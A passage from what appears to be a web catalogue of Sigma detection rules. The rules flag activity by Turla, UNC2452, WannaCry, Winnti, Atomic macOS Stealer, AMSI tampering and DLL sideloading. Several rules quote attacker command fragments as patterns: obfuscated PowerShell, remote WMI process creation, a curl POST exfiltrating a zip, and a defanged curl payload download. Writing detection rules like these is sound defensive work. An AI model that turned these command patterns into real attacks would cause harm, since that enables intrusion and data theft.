- '.WSqmCons))|iex;'
- 'Fr`omBa`se6`4Str`ing'
selection_cli_2:
CommandLine|re: 'net\s+use\s+https://docs.live.net'
CommandLine|contains: '@aol.co.uk'
condition: 1 of selection_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
Turla Group Lateral Movement
Detects automated lateral movement by Turla group
view Sigma YAML
title: Turla Group Lateral Movement
id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f
status: test
description: Detects automated lateral movement by Turla group
references:
- https://securelist.com/the-epic-turla-operation/65545/
author: Markus Neis
date: 2017-11-07
modified: 2022-10-09
tags:
- attack.g0010
- attack.execution
- attack.t1059
- attack.lateral-movement
- attack.t1021.002
- attack.discovery
- attack.t1083
- attack.t1135
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine:
- 'net use \\\\%DomainController%\C$ "P@ssw0rd" *'
- 'dir c:\\*.doc* /s'
- 'dir %TEMP%\\*.exe'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
UNC2452 PowerShell Pattern
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
view Sigma YAML
title: UNC2452 PowerShell Pattern
id: b7155193-8a81-4d8f-805d-88de864ca50c
status: test
description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
references:
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
- https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command
author: Florian Roth (Nextron Systems)
date: 2021-01-20
modified: 2022-10-09
tags:
- attack.execution
- attack.t1059.001
- attack.t1047
- detection.emerging-threats
# - sunburst
logsource:
category: process_creation
product: windows
detection:
selection_cli_1:
CommandLine|contains|all:
- 'Invoke-WMIMethod win32_process -name create -argumentlist'
- 'rundll32 c:\windows'
selection_cli_2:
CommandLine|contains|all:
- 'wmic /node:'
- 'process call create "rundll32 c:\windows'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
UNC4841 - Potential SEASPY Execution
Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
view Sigma YAML
title: UNC4841 - Potential SEASPY Execution
id: f6a711f3-d032-4f9e-890b-bbe776236c84
status: test
description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
references:
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-16
tags:
- attack.execution
- detection.emerging-threats
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith:
- '/BarracudaMailService'
- '/resize2fstab'
- '/resize_reisertab'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
WMI Backdoor Exchange Transport Agent
Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
view Sigma YAML
title: WMI Backdoor Exchange Transport Agent
id: 797011dc-44f4-4e6f-9f10-a8ceefbe566b
status: test
description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
references:
- https://twitter.com/cglyer/status/1182389676876980224
- https://twitter.com/cglyer/status/1182391019633029120
author: Florian Roth (Nextron Systems)
date: 2019-10-11
modified: 2023-02-08
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1546.003
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\EdgeTransport.exe'
filter_conhost:
Image: 'C:\Windows\System32\conhost.exe'
filter_oleconverter: # FP also documented in https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=18
Image|startswith: 'C:\Program Files\Microsoft\Exchange Server\'
Image|endswith: '\Bin\OleConverter.exe'
condition: selection and not 1 of filter_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
WannaCry Ransomware Activity
Detects WannaCry ransomware activity
view Sigma YAML
title: WannaCry Ransomware Activity
id: 41d40bff-377a-43e2-8e1b-2e543069e079
status: test
description: Detects WannaCry ransomware activity
references:
- https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
- https://x.com/nas_bench/status/1868639048484425963
author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro
date: 2019-01-16
modified: 2025-10-18
tags:
- attack.lateral-movement
- attack.defense-impairment
- attack.t1210
- attack.discovery
- attack.t1083
- attack.t1222.001
- attack.impact
- attack.t1486
- attack.t1490
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\tasksche.exe'
- '\mssecsvc.exe'
- '\taskdl.exe'
- '\taskhsvc.exe'
- '\taskse.exe'
- '\111.exe'
- '\lhdfrgui.exe'
# - '\diskpart.exe' # cannot be used in a rule of level critical
- '\linuxnew.exe'
- '\wannacry.exe'
- Image|contains: 'WanaDecryptor'
selection_cmd:
CommandLine|contains: '@[email protected]'
condition: 1 of selection_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
Windows Credential Editor Registry
Detects the use of Windows Credential Editor (WCE)
view Sigma YAML
title: Windows Credential Editor Registry
id: a6b33c02-8305-488f-8585-03cb2a7763f2
status: test
description: Detects the use of Windows Credential Editor (WCE)
references:
- https://www.ampliasecurity.com/research/windows-credentials-editor/
author: Florian Roth (Nextron Systems)
date: 2019-12-31
modified: 2021-11-27
tags:
- attack.credential-access
- attack.t1003.001
- attack.s0005
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: Services\WCESERVICE\Start
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Winnti Malware HK University Campaign
Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
view Sigma YAML
title: Winnti Malware HK University Campaign
id: 3121461b-5aa0-4a41-b910-66d25524edbb
status: test
description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
references:
- https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
author: Florian Roth (Nextron Systems), Markus Neis
date: 2020-02-01
modified: 2021-11-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.t1574.001
- attack.g0044
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection1:
ParentImage|contains:
- 'C:\Windows\Temp'
- '\hpqhvind.exe'
Image|startswith: 'C:\ProgramData\DRM'
selection2:
ParentImage|startswith: 'C:\ProgramData\DRM'
Image|endswith: '\wmplayer.exe'
selection3:
ParentImage|endswith: '\Test.exe'
Image|endswith: '\wmplayer.exe'
selection4:
Image: 'C:\ProgramData\DRM\CLR\CLR.exe'
selection5:
ParentImage|startswith: 'C:\ProgramData\DRM\Windows'
Image|endswith: '\SearchFilterHost.exe'
condition: 1 of selection*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Winnti Pipemon Characteristics
Detects specific process characteristics of Winnti Pipemon malware reported by ESET
view Sigma YAML
title: Winnti Pipemon Characteristics
id: 73d70463-75c9-4258-92c6-17500fe972f2
status: stable
description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
references:
- https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
author: Florian Roth (Nextron Systems), oscd.community
date: 2020-07-30
modified: 2021-11-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.t1574.001
- attack.g0044
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_1:
CommandLine|contains: 'setup0.exe -p'
selection_2:
CommandLine|contains: 'setup.exe'
CommandLine|endswith:
- '-x:0'
- '-x:1'
- '-x:2'
condition: 1 of selection_*
falsepositives:
- Legitimate setups that use similar flags
level: critical
Convert to SIEM query
critical
Moderate
High FP
Wmiexec Default Output File
Detects the creation of the default output filename used by the wmiexec tool
view Sigma YAML
title: Wmiexec Default Output File
id: 8d5aca11-22b3-4f22-b7ba-90e60533e1fb
status: test
description: Detects the creation of the default output filename used by the wmiexec tool
references:
- https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/
- https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-02
modified: 2023-03-08
tags:
- attack.lateral-movement
- attack.execution
- attack.t1047
logsource:
category: file_event
product: windows
detection:
selection:
- TargetFilename|re: '\\Windows\\__1\d{9}\.\d{1,7}$' # Admin$
- TargetFilename|re: 'C:\\__1\d{9}\.\d{1,7}$' # C$
- TargetFilename|re: 'D:\\__1\d{9}\.\d{1,7}$' # D$
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Wmiprvse Wbemcomn DLL Hijack - File
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
view Sigma YAML
title: Wmiprvse Wbemcomn DLL Hijack - File
id: 614a7e17-5643-4d89-b6fe-f9df1a79641c
status: test
description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
references:
- https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-12
modified: 2022-12-02
tags:
- attack.execution
- attack.t1047
- attack.lateral-movement
- attack.t1021.002
logsource:
product: windows
category: file_event
detection:
selection:
Image: System
TargetFilename|endswith: '\wbem\wbemcomn.dll'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
ZxShell Malware
Detects a ZxShell start by the called and well-known function name
view Sigma YAML
title: ZxShell Malware
id: f0b70adb-0075-43b0-9745-e82a1c608fcc
status: test
description: Detects a ZxShell start by the called and well-known function name
references:
- https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100
- https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf
author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
date: 2017-07-20
modified: 2021-11-27
tags:
- attack.execution
- attack.stealth
- attack.t1059.003
- attack.t1218.011
- attack.s0412
- attack.g0001
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\rundll32.exe'
CommandLine|contains:
- 'zxFunction'
- 'RemoteDiskXXXXX'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
high
Moderate
Medium FP
.RDP File Created By Uncommon Application
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
view Sigma YAML
title: .RDP File Created By Uncommon Application
id: fccfb43e-09a7-4bd2-8b37-a5a7df33386d
related:
- id: f748c45a-f8d3-4e6f-b617-fe176f695b8f
type: derived
status: test
description: |
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
references:
- https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/
- https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-18
modified: 2024-11-01
tags:
- attack.stealth
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith: '.rdp'
Image|endswith:
# Covers browsers
- '\brave.exe'
- '\CCleaner Browser\Application\CCleanerBrowser.exe'
- '\chromium.exe'
- '\firefox.exe'
- '\Google\Chrome\Application\chrome.exe'
- '\iexplore.exe'
- '\microsoftedge.exe'
- '\msedge.exe'
- '\Opera.exe'
- '\Vivaldi.exe'
- '\Whale.exe'
# Covers email clients
- '\olk.exe' # Outlook
- '\Outlook.exe'
- '\RuntimeBroker.exe' # If the windows mail client is used
- '\Thunderbird.exe'
# Covers chat applications
- '\Discord.exe' # Should open the browser for download, but just in case.
- '\Keybase.exe'
- '\msteams.exe'
- '\Slack.exe'
- '\teams.exe'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
AMSI Disabled via Registry Modification
Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.
Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.
Adversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.
view Sigma YAML
title: AMSI Disabled via Registry Modification
id: aa37cbb0-da36-42cb-a90f-fdf216fc7467
related:
- id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981 # Windows AMSI Related Registry Tampering Via CommandLine
type: similar
status: experimental
description: |
Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.
Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.
Adversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.
references:
- https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
- https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
- https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-12-25
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|endswith: '\Software\Microsoft\Windows Script\Settings\AmsiEnable'
Details: 'DWORD (0x00000000)'
condition: selection
falsepositives:
- Unlikely
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml
simulation:
- type: atomic-red-team
name: AMSI Bypass - Create AMSIEnable Reg Key
technique: T1562.001
atomic_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0
Convert to SIEM query
high
Strong
Medium FP
APT PRIVATELOG Image Load Pattern
Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
view Sigma YAML
title: APT PRIVATELOG Image Load Pattern
id: 33a2d1dd-f3b0-40bd-8baf-7974468927cc
status: test
description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
references:
- https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
author: Florian Roth (Nextron Systems)
date: 2021-09-07
modified: 2022-10-09
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
- detection.emerging-threats
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\svchost.exe'
ImageLoaded|endswith: '\clfsw32.dll'
condition: selection
falsepositives:
- Rarely observed
level: high
Convert to SIEM query
high
Moderate
Medium FP
Abusable DLL Potential Sideloading From Suspicious Location
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
view Sigma YAML
title: Abusable DLL Potential Sideloading From Suspicious Location
id: 799a5f48-0ac1-4e0f-9152-71d137d48c2a
status: test
description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
references:
- https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html
- https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
author: X__Junior (Nextron Systems)
date: 2023-07-11
tags:
- attack.execution
- attack.t1059
logsource:
category: image_load
product: windows
detection:
selection_dll:
ImageLoaded|endswith:
# Note: Add more generic DLLs that cannot be pin-pointed to a single application
- '\coreclr.dll'
- '\facesdk.dll'
- '\HPCustPartUI.dll'
- '\libcef.dll'
- '\ZIPDLL.dll'
selection_folders_1:
ImageLoaded|contains:
- ':\Perflogs\'
- ':\Users\Public\'
- '\Temporary Internet'
- '\Windows\Temp\'
selection_folders_2:
- ImageLoaded|contains|all:
- ':\Users\'
- '\Favorites\'
- ImageLoaded|contains|all:
- ':\Users\'
- '\Favourites\'
- ImageLoaded|contains|all:
- ':\Users\'
- '\Contacts\'
- ImageLoaded|contains|all:
- ':\Users\'
- '\Pictures\'
condition: selection_dll and 1 of selection_folders_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Add Debugger Entry To Hangs Key For Persistence
Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
view Sigma YAML
title: Add Debugger Entry To Hangs Key For Persistence
id: 833ef470-fa01-4631-a79b-6f291c9ac498
status: test
description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
references:
- https://persistence-info.github.io/Data/wer_debugger.html
- https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-21
modified: 2023-08-17
tags:
- attack.persistence
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Hangs\Debugger'
condition: selection
falsepositives:
- This value is not set by default but could be rarly used by administrators
level: high
Convert to SIEM query
high
Moderate
High FP
Adwind RAT / JRAT
Detects javaw.exe in AppData folder as used by Adwind / JRAT
view Sigma YAML
title: Adwind RAT / JRAT
id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
status: test
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
- https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
date: 2017-11-10
modified: 2022-10-09
tags:
- attack.execution
- attack.t1059.005
- attack.t1059.007
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|contains|all:
- '\AppData\Roaming\Oracle'
- '\java'
- '.exe '
- CommandLine|contains|all:
- 'cscript.exe'
- 'Retrive'
- '.vbs '
condition: selection
level: high
Convert to SIEM query
high
Moderate
High FP
Adwind RAT / JRAT File Artifact
Detects javaw.exe in AppData folder as used by Adwind / JRAT
view Sigma YAML
title: Adwind RAT / JRAT File Artifact
id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1
related:
- id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
type: derived
status: test
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
- https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
date: 2017-11-10
modified: 2022-12-02
tags:
- attack.execution
- attack.t1059.005
- attack.t1059.007
logsource:
category: file_event
product: windows
detection:
selection:
- TargetFilename|contains|all:
- '\AppData\Roaming\Oracle\bin\java'
- '.exe'
- TargetFilename|contains|all:
- '\Retrive'
- '.vbs'
condition: selection
level: high
Convert to SIEM query
high
Moderate
Medium FP
Antivirus Filter Driver Disallowed On Dev Drive - Registry
Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
view Sigma YAML
title: Antivirus Filter Driver Disallowed On Dev Drive - Registry
id: 31e124fb-5dc4-42a0-83b3-44a69c77b271
status: test
description: |
Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
references:
- https://twitter.com/0gtweet/status/1720419490519752955
author: '@kostastsale, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-11-05
modified: 2024-08-16
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|endswith: '\FilterManager\FltmgrDevDriveAllowAntivirusFilter'
Details: 'DWORD (0x00000000)'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
Apache Spark Shell Command Injection - ProcessCreation
Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
view Sigma YAML
title: Apache Spark Shell Command Injection - ProcessCreation
id: c8a5f584-cdc8-42cc-8cce-0398e4265de3
status: test
description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
references:
- https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py
- https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html
- https://github.com/apache/spark/pull/36315/files
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-20
tags:
- attack.initial-access
- attack.t1190
- cve.2022-33891
- detection.emerging-threats
logsource:
product: linux
category: process_creation
detection:
selection:
ParentImage|endswith: '\bash'
CommandLine|contains:
- 'id -Gn `'
- "id -Gn '"
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
Aruba Network Service Potential DLL Sideloading
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
view Sigma YAML
title: Aruba Network Service Potential DLL Sideloading
id: 90ae0469-0cee-4509-b67f-e5efcef040f7
status: test
description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
references:
- https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-22
modified: 2023-03-15
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.t1574.001
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\arubanetsvc.exe'
ImageLoaded|endswith:
- '\wtsapi32.dll'
- '\msvcr100.dll'
- '\msvcp100.dll'
- '\dbghelp.dll'
- '\dbgcore.dll'
- '\wininet.dll'
- '\iphlpapi.dll'
- '\version.dll'
- '\cryptsp.dll'
- '\cryptbase.dll'
- '\wldp.dll'
- '\profapi.dll'
- '\sspicli.dll'
- '\winsta.dll'
- '\dpapi.dll'
filter:
ImageLoaded|startswith:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
- 'C:\Windows\WinSxS\'
condition: selection and not filter
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
view Sigma YAML
title: Atlassian Confluence CVE-2022-26134
id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66
related:
- id: 245f92e3-c4da-45f1-9070-bc552e06db11
type: derived
status: test
description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
references:
- https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-03
tags:
- attack.initial-access
- attack.execution
- attack.t1190
- attack.t1059
- cve.2022-26134
- detection.emerging-threats
logsource:
category: process_creation
product: linux
detection:
selection:
# Monitor suspicious child processes spawned by Confluence
ParentImage|startswith: '/opt/atlassian/confluence/'
ParentImage|endswith: '/java'
CommandLine|contains:
- '/bin/sh'
- 'bash'
- 'dash'
- 'ksh'
- 'zsh'
- 'csh'
- 'fish'
- 'curl'
- 'wget'
- 'python'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
view Sigma YAML
title: Atomic MacOS Stealer - FileGrabber Activity
id: e710a880-1f18-4417-b6a0-b5afdf7e33da
related:
- id: e710a880-1f18-4417-b6a0-b5afdf7e305a
type: obsolete
status: experimental
description: |
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
references:
- https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
- https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing
- https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36
- https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
- attack.execution
- attack.t1059.002
- detection.emerging-threats
logsource:
category: process_creation
product: macos
detection:
selection_curl_post:
CommandLine|contains|all:
- 'curl'
- 'POST'
- 'user:'
- '-H '
- 'BuildID'
- 'file=@/tmp/out.zip'
- 'cl: 0'
selection_filegrabber_exec:
CommandLine|contains|all:
- 'FileGrabber'
- '/tmp'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
view Sigma YAML
title: Atomic MacOS Stealer - Persistence Indicators
id: e710a880-1f18-4417-b6a0-b5afdf7e3023
status: experimental
description: |
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
references:
- https://moonlock.com/amos-backdoor-persistent-access
- https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
- attack.persistence
- attack.privilege-escalation
- attack.stealth
- attack.t1564.001
- attack.t1543.004
- detection.emerging-threats
logsource:
category: file_event
product: macos
detection:
selection_user_helper:
# sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app
Image|endswith: '/curl'
TargetFilename|startswith: '/Users/'
TargetFilename|endswith: '.helper'
selection_launchdaemon:
TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Attempts of Kerberos Coercion Via DNS SPN Spoofing
Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
or checking for the presence of such records through the `nslookup` command.
view Sigma YAML
title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
id: 0ed99dda-6a35-11ef-8c99-0242ac120002
related:
- id: b07e58cf-cacc-4135-8473-ccb2eba63dd2
type: similar
status: experimental
description: |
Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
or checking for the presence of such records through the `nslookup` command.
references:
- https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-06-20
tags:
- attack.collection
- attack.credential-access
- attack.persistence
- attack.privilege-escalation
- attack.t1557.001
- attack.t1187
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'UWhRCA'
- 'BAAAA'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Audit Policy Tampering Via NT Resource Kit Auditpol
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
view Sigma YAML
title: Audit Policy Tampering Via NT Resource Kit Auditpol
id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e
related:
